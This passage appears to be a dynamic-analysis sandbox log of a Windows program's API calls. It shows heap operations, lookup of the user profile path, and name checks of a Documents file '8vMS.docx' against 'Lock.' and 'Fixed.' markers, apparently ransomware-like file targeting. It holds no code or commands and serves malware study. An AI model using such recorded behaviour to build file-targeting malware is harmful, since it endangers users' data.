hHeap=0x25c0000) returned 1 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.834] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0260.834] TranslateMessage (lpMsg=0x8bf970) returned 0 [0260.834] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0260.834] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0260.834] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0260.834] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0260.834] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.834] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8vMS.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vMS.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MS.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0260.835] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0260.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0260.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0260.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8vMS.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vMS.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MS.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0260.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0260.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.838] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0260.838] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0260.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0260.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0260.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0260.839] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.839] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0260.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0260.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0260.842] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.843] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0260.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0260.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0260.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0260.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0260.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0260.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0260.846] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0260.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.846] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.847] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/8vMS.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb5a550, ftCreationTime.dwHighDateTime=0x1d4b9e4, ftLastAccessTime.dwLowDateTime=0x51c1c680, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0x51c1c680, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0xfd98, dwReserved0=0xa070047, dwReserved1=0x2203e, cFileName="8vMS.docx", 